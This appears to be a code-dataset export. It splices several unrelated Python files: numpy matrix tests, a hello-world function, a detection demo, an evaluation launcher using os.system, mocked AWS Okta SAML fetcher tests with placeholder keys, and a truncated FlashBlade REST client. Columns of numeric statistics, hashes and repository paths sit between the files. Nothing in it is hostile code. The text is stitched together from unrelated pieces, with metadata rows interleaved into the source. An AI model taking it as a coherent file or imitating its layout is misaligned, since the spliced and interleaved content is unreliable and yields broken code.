        base and exponent positions."""
        n_matrix = self.n_matrix
        local_matrix = n_matrix ** 2
        assert_equal(local_matrix.ent_table, np.power(self.s, 2))
        assert_equal(local_matrix.att_table[0], np.power(self.r[0], 2))
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.power(n_matrix, 2)
        assert_equal(local_matrix.ent_table, np.power(self.s, 2))
        assert_equal(local_matrix.att_table[0], np.power(self.r[0], 2))
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.power(2, n_matrix)
        assert_equal(local_matrix.ent_table, np.power(2, self.s))
        assert_equal(local_matrix.att_table[0], np.power(2, self.r[0]))
        assert_equal(local_matrix.kfkds[0], self.k[0])

    def test_transpose(self):
        """Double transpose is an identity; a single transpose changes
        the column sums."""
        n_matrix = self.n_matrix
        assert_equal(n_matrix.T.T.sum(axis=0), n_matrix.sum(axis=0))
        assert_equal(np.array_equal(n_matrix.T.sum(
            axis=0), n_matrix.sum(axis=0)), False)

    def test_inverse(self):
        # Pseudo-inverse is deterministic for the same normalized matrix.
        n_matrix = self.n_matrix
        assert_almost_equal(n_matrix.I, self.n_matrix.I)

    def test_row_sum(self):
        # Row sums match the materialized matrix.
        n_matrix = self.n_matrix
        assert_almost_equal(n_matrix.sum(axis=1), self.m.sum(axis=1))

    def test_row_sum_trans(self):
        # Row sums of a transposed normalized matrix match m.T.
        n_matrix = nm.NormalizedMatrix(self.s, self.r, self.k, trans=True)
        assert_almost_equal(n_matrix.sum(axis=1), self.m.T.sum(axis=1))

    def test_col_sum(self):
        # Column sums match the materialized matrix.
        n_matrix = self.n_matrix
        assert_almost_equal(n_matrix.sum(axis=0), self.m.sum(axis=0))

    def test_row_col_trans(self):
        # Column sums of a transposed normalized matrix match m.T.
        n_matrix = nm.NormalizedMatrix(self.s, self.r, self.k, trans=True)
        assert_almost_equal(n_matrix.sum(axis=0), self.m.T.sum(axis=0))

    def test_sum(self):
        # Grand total matches the materialized matrix.
        n_matrix = self.n_matrix
        assert_almost_equal(n_matrix.sum(), self.m.sum())

    def test_lmm(self):
        # Left matrix-vector multiply: n_matrix * x == m * x.
        n_matrix = self.n_matrix
        x = np.matrix([[1.0], [2.0], [3.0], [4.0]])
        assert_equal(n_matrix * x, self.m * x)

    def test_lmm_trans(self):
        # Left multiply on the transpose.
        n_matrix = self.n_matrix.T
        x = np.matrix([[1.0], [2.0], [3.0], [4.0], [5.0]])
        assert_almost_equal(n_matrix * x, self.m.T * x)

    def test_rmm(self):
        # Right matrix multiply: x * n_matrix == x * m.
        n_matrix = self.n_matrix
        x = np.matrix([[1.0, 2.0, 3.0, 4.0, 5.0]])
        assert_almost_equal(x * n_matrix, x * self.m)

    def test_rmm_trans(self):
        # Right multiply against the transpose.
        n_matrix = self.n_matrix
        x = np.matrix([[1.0, 2.0, 3.0, 4.0]])
        assert_equal(x * n_matrix.T, x * self.m.T)

    def test_cross_prod(self):
        """Gram matrix (X.T * X) via operator, ufunc, multiple attribute
        tables, and sparse attribute tables."""
        n_matrix = self.n_matrix.T * self.n_matrix
        assert_almost_equal(n_matrix, self.m.T * self.m)
        n_matrix = np.multiply(self.n_matrix.T, self.n_matrix)
        assert_almost_equal(n_matrix, self.m.T * self.m)
        # Two attribute tables joined through two key arrays.
        s = np.matrix([[1.0, 2.0], [4.0, 3.0], [
            5.0, 6.0], [8.0, 7.0], [9.0, 1.0]])
        k = [np.array([0, 1, 1, 0, 1]), np.array([0, 1, 1, 1, 0])]
        r = [np.matrix([[1.1, 2.2], [3.3, 4.4]]),
             np.matrix([[0.1, 0.2], [0.3, 0.4]])]
        n_matrix = nm.NormalizedMatrix(s, r, k)
        m = np.hstack([s, r[0][k[0]], r[1][k[1]]])
        assert_almost_equal(n_matrix.T * n_matrix, m.T * m)
        # Sparse attribute tables produce a sparse Gram matrix.
        n_matrix = nm.NormalizedMatrix(s, [sp.coo_matrix(ri) for ri in r], k)
        assert_almost_equal((n_matrix.T * n_matrix).toarray(), m.T * m)

    def test_cross_prod_trans(self):
        # Gram matrix of the transpose (X * X.T), dense and sparse.
        n_matrix = self.n_matrix.T
        n_matrix = n_matrix.T * n_matrix
        assert_almost_equal(n_matrix, self.m * self.m.T)
        n_matrix = nm.NormalizedMatrix(
            self.s, [sp.coo_matrix(att) for att in self.r], self.k).T
        n_matrix = n_matrix.T * n_matrix
        assert_almost_equal(n_matrix, self.m * self.m.T)

    def test_cross_prod_hess(self):
        # Weighted cross product used for Hessian computation:
        # X * diag(w) * X.T, dense and sparse.
        n_matrix = self.n_matrix
        assert_almost_equal(n_matrix._cross_prod_hess(
            np.arange(4)), self.m.dot(np.arange(4).reshape(-1, 1) * self.m.T))
        n_matrix = nm.NormalizedMatrix(
            self.s, [sp.coo_matrix(att) for att in self.r], self.k)
        assert_almost_equal(n_matrix._cross_prod_hess(
            np.arange(4)), self.m.dot(np.arange(4).reshape(-1, 1) * self.m.T))

    def test_cross_prod_hess_tran(self):
        # Same weighted cross product on the transposed matrix.
        n_matrix = self.n_matrix.T
        assert_almost_equal(n_matrix._cross_prod_hess(
            np.arange(5)), self.m.T.dot(np.arange(5).reshape(-1, 1) * self.m))
        n_matrix = nm.NormalizedMatrix(
            self.s, [sp.coo_matrix(att) for att in self.r], self.k).T
        assert_almost_equal(n_matrix._cross_prod_hess(
            np.arange(5)), self.m.T.dot(np.arange(5).reshape(-1, 1) * self.m))

    def test_max(self):
        # Global and per-column max match the materialized matrix.
        n_matrix = self.n_matrix
        assert_equal(n_matrix.max(), self.m.max())
        assert_equal(n_matrix.max(axis=0), self.m.max(axis=0))

    def test_min(self):
        # Global and per-column min match the materialized matrix.
        n_matrix = self.n_matrix
        assert_equal(n_matrix.min(), self.m.min())
        assert_equal(n_matrix.min(axis=0), self.m.min(axis=0))

    def test_mean(self):
        # Global and per-column mean match the materialized matrix.
        n_matrix = self.n_matrix
        assert_equal(n_matrix.mean(), self.m.mean())
        assert_equal(n_matrix.mean(axis=0), self.m.mean(axis=0))

    def test_var(self):
        # Global and per-column variance match the materialized matrix.
        n_matrix = self.n_matrix
        assert_equal(n_matrix.var(), self.m.var())
        assert_equal(n_matrix.var(axis=0), self.m.var(axis=0))

    def test_std(self):
        # Global and per-column std match the materialized matrix.
        n_matrix = self.n_matrix
        assert_equal(n_matrix.std(), self.m.std())
        assert_equal(n_matrix.std(axis=0), self.m.std(axis=0))

    def test_mean_centering(self):
        """Mean centering: global (scalar mean) and per-column (axis=0,
        checked against sklearn's StandardScaler without scaling)."""
        n_matrix = utils.mean_centering(self.n_matrix)
        assert_equal(np.hstack((n_matrix.ent_table, n_matrix.att_table[0][n_matrix.kfkds[0]])),
                     self.m - self.m.mean())
        n_matrix = utils.mean_centering(self.n_matrix, axis=0)
        scaler = preprocess.StandardScaler(with_std=False)
        scaler.fit(self.m)
        assert_equal(np.hstack((n_matrix.ent_table, n_matrix.att_table[0][n_matrix.kfkds[0]])),
                     scaler.transform(self.m))

    def test_standardization(self):
        """Standardization: global (scalar mean/std) and per-column
        (axis=0, checked against sklearn's StandardScaler)."""
        n_matrix = utils.standardization(self.n_matrix)
        assert_equal(np.hstack((n_matrix.ent_table, n_matrix.att_table[0][n_matrix.kfkds[0]])),
                     (self.m - self.m.mean()) / self.m.std())
        n_matrix = utils.standardization(self.n_matrix, axis=0)
        scaler = preprocess.StandardScaler()
        scaler.fit(self.m)
        assert_equal(np.hstack((n_matrix.ent_table, n_matrix.att_table[0][n_matrix.kfkds[0]])),
                     scaler.transform(self.m))

    def test_normalization(self):
        # Min-max normalization with global mean/range.
        n_matrix = utils.normalization(self.n_matrix)
        assert_equal(np.hstack((n_matrix.ent_table, n_matrix.att_table[0][n_matrix.kfkds[0]])),
                     (self.m - self.m.mean()) / (self.m.max() - self.m.min()))

    def test_imputation(self):
        """NaN imputation: with the global mean, then per-column means
        (axis=0) across two attribute tables."""
        s = np.matrix([[1.0, np.nan], [4.0, 3.0], [
            5.0, 6.0], [8.0, 7.0], [9.0, 1.0]])
        k = self.k
        r = [np.matrix([[np.nan, 2.2], [3.3, 4.4]])]
        m = np.hstack([s, r[0][k[0]]])
        m[np.isnan(m)] = np.nanmean(m)
        n_matrix = nm.NormalizedMatrix(s, r, k)
        assert_equal(utils.imputation(n_matrix).sum(axis=0), m.sum(axis=0))
        s = np.matrix([[1.0, np.nan], [4.0, 3.0], [
            5.0, 6.0], [8.0, 7.0], [9.0, 1.0]])
        k = [np.array([0, 1, 1, 0, 1]), np.array([0, 1, 1, 0, 1])]
        r = [np.matrix([[np.nan, 2.2], [3.3, 4.4]]),
             np.matrix([[np.nan, 2.2], [3.3, 4.4]])]
        m = np.hstack([s, r[0][k[0]], r[1][k[1]]])
        mean = np.nanmean(m, axis=0)
        inds = np.where(np.isnan(m))
        m[inds] = np.take(mean, inds[1])
        n_matrix = nm.NormalizedMatrix(s, r, k)
        assert_almost_equal(utils.imputation(
            n_matrix, axis=0).sum(axis=0), m.sum(axis=0))
# Allow running this test module directly via numpy's test runner.
if __name__ == "__main__":
    run_module_suite()
| 39.300699
| 95
| 0.60344
| 2,845
| 16,860
| 3.362742
| 0.059051
| 0.118532
| 0.160552
| 0.220759
| 0.86443
| 0.829414
| 0.823247
| 0.80715
| 0.761054
| 0.745166
| 0
| 0.053303
| 0.237782
| 16,860
| 428
| 96
| 39.392523
| 0.691152
| 0.033155
| 0
| 0.455975
| 0
| 0
| 0.000491
| 0
| 0
| 0
| 0
| 0
| 0.427673
| 1
| 0.091195
| false
| 0
| 0.018868
| 0
| 0.128931
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
851594dabaf62af9a28e0b5be3244437b101c0fb
| 55
|
py
|
Python
|
examples/python/hello_world.py
|
12tqian/verification-helper-1
|
bfdb9a357b451a1385e5327417b3d17168ad2d51
|
[
"MIT"
] | 88
|
2020-05-03T03:29:01.000Z
|
2022-03-01T09:12:44.000Z
|
examples/python/hello_world.py
|
12tqian/verification-helper-1
|
bfdb9a357b451a1385e5327417b3d17168ad2d51
|
[
"MIT"
] | 158
|
2019-11-25T16:48:06.000Z
|
2020-05-02T14:39:56.000Z
|
examples/python/hello_world.py
|
12tqian/verification-helper-1
|
bfdb9a357b451a1385e5327417b3d17168ad2d51
|
[
"MIT"
] | 40
|
2020-05-05T09:26:03.000Z
|
2022-03-13T16:14:41.000Z
|
def get_hello_world() -> str:
    """Return the canonical greeting string."""
    greeting = "Hello World"
    return greeting
| 18.333333
| 29
| 0.672727
| 8
| 55
| 4.375
| 0.75
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 55
| 2
| 30
| 27.5
| 0.795455
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
85163ecbf36a453edd7f30109e9926d0ea8877f2
| 169
|
py
|
Python
|
demo.py
|
chuzcjoe/dms_detection
|
f8edd2251df561808caf717a06bd04dca039b740
|
[
"MIT"
] | 4
|
2019-07-26T07:41:34.000Z
|
2019-11-03T18:44:27.000Z
|
demo.py
|
chuzcjoe/distracted_driver_detection
|
f8edd2251df561808caf717a06bd04dca039b740
|
[
"MIT"
] | 1
|
2020-01-21T20:12:23.000Z
|
2020-01-21T20:12:35.000Z
|
release/demo.py
|
chuzcjoe/distracted_driver_detection
|
f8edd2251df561808caf717a06bd04dca039b740
|
[
"MIT"
] | null | null | null |
from detect import Detection

# from Detection import detect

# Run detection on each sample image and print the result.
for image_path in ('test.jpg', 'test2.jpg'):
    print(Detection().detect(image_path))
| 24.142857
| 38
| 0.751479
| 22
| 169
| 5.772727
| 0.363636
| 0.354331
| 0.314961
| 0.346457
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006369
| 0.071006
| 169
| 6
| 39
| 28.166667
| 0.802548
| 0.343195
| 0
| 0
| 0
| 0
| 0.155963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 8
|
517e6846831c47ae5af9e391348dfdd3a4ee0cf6
| 570
|
py
|
Python
|
eval_covid20cases_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os

# Evaluation commands for the five cross-validation folds of the
# covid20cases / unetplusplus / timm-regnetx_002 / GridDistortion setting.
_COMMAND_TEMPLATE = (
    "python main.py --configs configs/"
    "eval_covid20cases_unetplusplus_timm-regnetx_002_{}_GridDistortion.yml"
)

ls = [_COMMAND_TEMPLATE.format(fold) for fold in range(5)]

for l in ls:
    os.system(l)
| 51.818182
| 108
| 0.854386
| 80
| 570
| 5.7125
| 0.3
| 0.109409
| 0.131291
| 0.207877
| 0.892779
| 0.892779
| 0.892779
| 0.892779
| 0.892779
| 0.892779
| 0
| 0.055659
| 0.054386
| 570
| 11
| 109
| 51.818182
| 0.792208
| 0
| 0
| 0
| 0
| 0
| 0.884413
| 0.665499
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
517f6e00126117133317e35a15c52cac286da631
| 5,061
|
py
|
Python
|
tests/core/test_fetcher.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
tests/core/test_fetcher.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
tests/core/test_fetcher.py
|
dclayton-godaddy/aws-okta-processor
|
ec7603a194ab24d40c2aee4f05e4f87296a880d5
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from unittest import mock
from tests.test_base import TestBase
from tests.test_base import SAML_RESPONSE
from mock import patch, call
from mock import MagicMock
from aws_okta_processor.commands.authenticate import Authenticate
from aws_okta_processor.core.fetcher import SAMLFetcher
# Need to add actual tests
class TestFetcher(TestBase):
    """Tests for SAMLFetcher.fetch_credentials with Okta, boto3 and the
    role-selection prompt all mocked.

    NOTE: stacked @patch decorators inject mocks bottom-up, so the
    innermost decorator maps to the first mock parameter after self.
    """

    @patch("botocore.client")
    @patch('aws_okta_processor.core.fetcher.print_tty')
    @patch('aws_okta_processor.core.fetcher.Okta')
    def test_fetcher(
            self,
            mock_okta,
            mock_print_tty,
            mock_client
    ):
        # Smoke test: with an explicit --role and a canned SAML response,
        # fetch_credentials() completes without error (no assertions yet).
        self.OPTIONS["--role"] = "arn:aws:iam::2:role/Role-One"
        mock_okta().get_saml_response.return_value = SAML_RESPONSE
        mock_cache = MagicMock()
        authenticate = Authenticate(self.OPTIONS)
        fetcher = SAMLFetcher(authenticate, cache=mock_cache)
        fetcher.fetch_credentials()

    @patch("boto3.client")
    @patch('aws_okta_processor.core.fetcher.print_tty')
    @patch('aws_okta_processor.core.fetcher.prompt.print_tty')
    @patch('aws_okta_processor.core.fetcher.prompt.input', return_value='1')
    @patch('aws_okta_processor.core.fetcher.Okta')
    def test_fetcher_should_filter_accounts(
            self,
            mock_okta,
            mock_prompt,
            mock_prompt_print_tty,
            mock_print_tty,
            mock_client
    ):
        # --account-alias '1*' should restrict the role prompt to
        # account 1 only (5 prompt lines instead of 7).
        def assume_role_side_effect(*args, **kwargs):
            # Only the Role-One ARN in account 1 is allowed to succeed;
            # any other role selection is a test failure.
            if kwargs['RoleArn'] == 'arn:aws:iam::1:role/Role-One':
                return {
                    'Credentials': {
                        'AccessKeyId': 'test-key1',
                        'SecretAccessKey': 'test-secret1',
                        'SessionToken': 'test-token1',
                        'Expiration': datetime(2020, 4, 17, 12, 0, 0, 0)
                    }
                }
            raise RuntimeError('invalid RoleArn')

        self.OPTIONS["--account-alias"] = '1*'
        self.OPTIONS["--pass"] = 'testpass'
        mock_c = mock.Mock()
        mock_c.assume_role_with_saml.side_effect = assume_role_side_effect
        mock_okta().get_saml_response.return_value = SAML_RESPONSE
        mock_client.return_value = mock_c
        authenticate = Authenticate(self.OPTIONS)
        fetcher = SAMLFetcher(authenticate, cache={})
        creds = fetcher.fetch_credentials()
        # Credentials come back serialized (Expiration as ISO string).
        self.assertDictEqual({
            'AccessKeyId': 'test-key1',
            'Expiration': '2020-04-17T12:00:00',
            'SecretAccessKey': 'test-secret1',
            'SessionToken': 'test-token1'
        }, creds)
        # Only account 1's roles were shown in the prompt.
        self.assertEqual(5, mock_prompt_print_tty.call_count)
        MagicMock.assert_has_calls(mock_prompt_print_tty, [
            call('Select AWS Role:'),
            call('Account: 1', indents=0),
            call('[ 1 ] Role-One', indents=1),
            call('[ 2 ] Role-Two', indents=1),
            call('Selection: ', newline=False)
        ])

    @patch("boto3.client")
    @patch('aws_okta_processor.core.fetcher.print_tty')
    @patch('aws_okta_processor.core.fetcher.prompt.print_tty')
    @patch('aws_okta_processor.core.fetcher.prompt.input', return_value='1')
    @patch('aws_okta_processor.core.fetcher.Okta')
    def test_fetcher_should_prompt_all_accounts(
            self,
            mock_okta,
            mock_prompt,
            mock_prompt_print_tty,
            mock_print_tty,
            mock_client
    ):
        # Without an --account-alias filter, roles from every account
        # appear in the prompt (7 prompt lines).
        def assume_role_side_effect(*args, **kwargs):
            # Only account 1's Role-One may be assumed.
            if kwargs['RoleArn'] == 'arn:aws:iam::1:role/Role-One':
                return {
                    'Credentials': {
                        'AccessKeyId': 'test-key1',
                        'SecretAccessKey': 'test-secret1',
                        'SessionToken': 'test-token1',
                        'Expiration': datetime(2020, 4, 17, 12, 0, 0, 0)
                    }
                }
            raise RuntimeError('invalid RoleArn')

        self.OPTIONS["--pass"] = 'testpass'
        mock_c = mock.Mock()
        mock_c.assume_role_with_saml.side_effect = assume_role_side_effect
        mock_okta().get_saml_response.return_value = SAML_RESPONSE
        mock_client.return_value = mock_c
        authenticate = Authenticate(self.OPTIONS)
        fetcher = SAMLFetcher(authenticate, cache={})
        creds = fetcher.fetch_credentials()
        self.assertDictEqual({
            'AccessKeyId': 'test-key1',
            'Expiration': '2020-04-17T12:00:00',
            'SecretAccessKey': 'test-secret1',
            'SessionToken': 'test-token1'
        }, creds)
        # Both accounts' roles were listed before the selection prompt.
        self.assertEqual(7, mock_prompt_print_tty.call_count)
        MagicMock.assert_has_calls(mock_prompt_print_tty, [
            call('Select AWS Role:'),
            call('Account: 1', indents=0),
            call('[ 1 ] Role-One', indents=1),
            call('[ 2 ] Role-Two', indents=1),
            call('Account: 2', indents=0),
            call('[ 3 ] Role-One', indents=1),
            call('Selection: ', newline=False)
        ])
| 35.391608
| 76
| 0.589212
| 547
| 5,061
| 5.210238
| 0.184644
| 0.039298
| 0.067368
| 0.077193
| 0.861404
| 0.825614
| 0.806667
| 0.806667
| 0.782105
| 0.782105
| 0
| 0.025154
| 0.293025
| 5,061
| 143
| 77
| 35.391608
| 0.771381
| 0.004742
| 0
| 0.781513
| 0
| 0
| 0.232129
| 0.099087
| 0
| 0
| 0
| 0
| 0.05042
| 1
| 0.042017
| false
| 0.016807
| 0.067227
| 0
| 0.134454
| 0.117647
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51ace97bf7b8e6b0445efe966ab2ed31dd65af4f
| 83
|
py
|
Python
|
regulus/models/__init__.py
|
yarden-livnat/regulus
|
ab78a5ef7d2dcdc95f5f8e16dfe58c8db296812f
|
[
"BSD-3-Clause"
] | 3
|
2018-03-16T20:47:48.000Z
|
2020-01-07T15:58:18.000Z
|
regulus/models/__init__.py
|
yarden-livnat/regulus.py
|
ab78a5ef7d2dcdc95f5f8e16dfe58c8db296812f
|
[
"BSD-3-Clause"
] | 3
|
2018-03-25T07:18:39.000Z
|
2020-05-06T19:41:38.000Z
|
regulus/models/__init__.py
|
yarden-livnat/regulus.py
|
ab78a5ef7d2dcdc95f5f8e16dfe58c8db296812f
|
[
"BSD-3-Clause"
] | 3
|
2018-03-16T20:48:05.000Z
|
2018-08-30T20:38:00.000Z
|
from .linear_model import *
from .quadratic_model import *
from .inv_reg import *
| 16.6
| 30
| 0.771084
| 12
| 83
| 5.083333
| 0.583333
| 0.360656
| 0.491803
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156627
| 83
| 4
| 31
| 20.75
| 0.871429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
51e66c72f1854aa2c99c7c11621d792b4bacc228
| 59,774
|
py
|
Python
|
pypureclient/flashblade/FB_2_1/api/arrays_api.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 14
|
2018-12-07T18:30:27.000Z
|
2022-02-22T09:12:33.000Z
|
pypureclient/flashblade/FB_2_1/api/arrays_api.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 28
|
2019-09-17T21:03:52.000Z
|
2022-03-29T22:07:35.000Z
|
pypureclient/flashblade/FB_2_1/api/arrays_api.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 15
|
2020-06-11T15:50:08.000Z
|
2022-03-21T09:27:25.000Z
|
# coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.1, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re
# python 2 and python 3 compatibility library
import six
from typing import List, Optional
from .. import models
class ArraysApi(object):
def __init__(self, api_client):
    # Shared API client used to issue every HTTP request for this API group.
    self.api_client = api_client
def api21_arrays_eula_get_with_http_info(
self,
continuation_token=None, # type: str
filter=None, # type: str
limit=None, # type: int
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.EulaGetResponse
"""GET arrays/eula
List the End User Agreement and signature.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_eula_get_with_http_info(async_req=True)
>>> result = thread.get()
:param str continuation_token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param str filter: Exclude resources that don't match the specified criteria.
:param int limit: Limit the size of the response to the specified number of resources. A `limit` of `0` can be used to get the number of resources without getting all of the resources. It will be returned in the `total_item_count` field. If a client asks for a page size larger than the maximum number, the request is still valid. In that case the server just returns the maximum number of items, disregarding the client's page size request.
:param int offset: The offset of the first resource to return from a collection.
:param list[str] sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name). NOTE: If you provide a sort you will not get a `continuation_token` in the response.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: EulaGetResponse
If the method is called asynchronously,
returns the request thread.
"""
if sort is not None:
if not isinstance(sort, list):
sort = [sort]
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'limit' in params and params['limit'] < 1:
raise ValueError("Invalid value for parameter `limit` when calling `api21_arrays_eula_get`, must be a value greater than or equal to `1`")
if 'offset' in params and params['offset'] < 0:
raise ValueError("Invalid value for parameter `offset` when calling `api21_arrays_eula_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'continuation_token' in params:
query_params.append(('continuation_token', params['continuation_token']))
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'offset' in params:
query_params.append(('offset', params['offset']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
collection_formats['sort'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/eula', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EulaGetResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_eula_patch_with_http_info(
self,
eula=None, # type: models.Eula
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.EulaResponse
"""PATCH arrays/eula
Modifies the signature on the End User Agreement.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_eula_patch_with_http_info(eula, async_req=True)
>>> result = thread.get()
:param Eula eula: (required)
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: EulaResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
# verify the required parameter 'eula' is set
if eula is None:
raise TypeError("Missing the required parameter `eula` when calling `api21_arrays_eula_patch`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'eula' in params:
body_params = params['eula']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/eula', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EulaResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_factory_reset_token_delete_with_http_info(
self,
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> None
"""Delete a factory reset token
Deletes any existing token that could be used to perform a factory reset on the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_factory_reset_token_delete_with_http_info(async_req=True)
>>> result = thread.get()
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
